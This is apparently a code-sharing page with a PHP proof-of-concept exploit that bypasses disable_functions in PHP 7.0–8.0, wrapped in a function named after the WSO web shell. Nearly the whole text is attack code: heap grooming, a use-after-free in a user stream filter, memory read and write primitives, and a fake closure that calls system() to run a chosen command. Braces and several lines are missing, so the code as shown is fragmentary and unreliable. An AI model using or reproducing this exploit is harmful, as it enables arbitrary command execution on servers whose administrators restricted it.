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Last active December 20, 2021 06:46
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PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
# PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
# Bug:
# This exploit should work on all PHP 7.0-8.0 versions
# released as of 2021-10-06
# Author:
function wsoExGently($cmd) {
define('LOGGING', false);
define('CHUNK_DATA_SIZE', 0x60);
define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
define('CMD', $cmd);
for($i = 0; $i < 10; $i++) {
$groom[] = Pwn::alloc(STRING_SIZE);
$filtername = 'pwn_filter'.rand(1e4,1e5);
stream_filter_register($filtername, 'Pwn');
$fd = fopen('php://memory', 'w');
stream_filter_append($fd, $filtername);
fwrite($fd, 'x');
class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
private $abc, $abc_addr;
private $helper, $helper_addr, $helper_off;
private $uafp, $hfp;
public function filter($in, $out, &$consumed, $closing) {
if($closing) return;
$this->filtername = Pwn::alloc(STRING_SIZE);
return PSFS_PASS_ON;
private function go() {
$this->abc = &$this->filtername;
$this->helper = new Helper;
$this->helper->b = function($x) {};
$this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
$this->log("helper @ 0x%x", $this->helper_addr);
$this->abc_addr = $this->helper_addr - CHUNK_SIZE;
$this->log("abc @ 0x%x", $this->abc_addr);
$this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
$helper_handlers = $this->str2ptr(CHUNK_SIZE);
$this->log("helper handlers @ 0x%x", $helper_handlers);
$binary_leak = $this->read($helper_handlers + 8);
$this->log("binary leak @ 0x%x", $binary_leak);
$closure_addr = $this->str2ptr($this->helper_off + 0x38);
$this->log("real closure @ 0x%x", $closure_addr);
$closure_ce = $this->read($closure_addr + 0x10);
$this->log("closure class_entry @ 0x%x", $closure_ce);
$basic_funcs = $this->get_basic_funcs($closure_ce);
$this->log("basic_functions @ 0x%x", $basic_funcs);
$zif_system = $this->get_system($basic_funcs);
$this->log("zif_system @ 0x%x", $zif_system);
$fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
for($i = 0; $i < 0x138; $i += 8) {
$this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
$this->write($fake_closure_off + 0x38, 1, 4);
$handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
$this->write($fake_closure_off + $handler_offset, $zif_system);
$fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
$this->write($this->helper_off + 0x38, $fake_closure_addr);
$this->log("fake closure @ 0x%x", $fake_closure_addr);
private function make_uaf_obj() {
$this->uafp = fopen('php://memory', 'w');
fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
for($i = 0; $i < STRING_SIZE; $i++) {
fwrite($this->uafp, "\x00");
private function prepare_leaker() {
$str_off = $this->helper_off + CHUNK_SIZE + 8;
$this->write($str_off, 2);
$this->write($str_off + 0x10, 6);
$val_off = $this->helper_off + 0x48;
$this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
$this->write($val_off + 8, 0xA);
private function prepare_cleanup($binary_leak) {
$ret_gadget = $binary_leak;
do {
} while($this->read($ret_gadget, 1) !== 0xC3);
$this->log("ret gadget = 0x%x", $ret_gadget);
$this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
$this->write(8, $ret_gadget);
private function read($addr, $n = 8) {
$this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
$value = strlen($this->helper->c);
if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
return $value;
private function write($p, $v, $n = 8) {
for($i = 0; $i < $n; $i++) {
$this->abc[$p + $i] = chr($v & 0xff);
$v >>= 8;
private function get_basic_funcs($addr) {
while(true) {
$addr -= 0x10;
if($this->read($addr, 4) === 0xA8 &&
in_array($this->read($addr + 4, 4),
[20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
$module_name_addr = $this->read($addr + 0x20);
$module_name = $this->read($module_name_addr);
if($module_name === 0x647261646e617473) {
$this->log("standard module @ 0x%x", $addr);
return $this->read($addr + 0x28);
private function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->read($addr);
$f_name = $this->read($f_entry, 6);
if($f_name === 0x6d6574737973) {
return $this->read($addr + 8);
$addr += 0x20;
} while($f_entry !== 0);
private function cleanup() {
$this->hfp = fopen('php://memory', 'w');
fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
fwrite($this->hfp, "\x00");
private function str2ptr($p = 0, $n = 8) {
$address = 0;
for($j = $n - 1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($this->abc[$p + $j]);
return $address;
private function ptr2str($ptr, $n = 8) {
$out = '';
for ($i = 0; $i < $n; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
return $out;
private function log($format, $val = '') {
printf("{$format}\n", $val);
static function alloc($size) {
return str_shuffle(str_repeat('A', $size));
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